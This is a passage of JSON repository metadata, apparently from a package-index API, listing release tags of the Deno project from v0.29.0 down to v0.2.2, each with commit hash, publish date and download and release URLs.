bd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/ta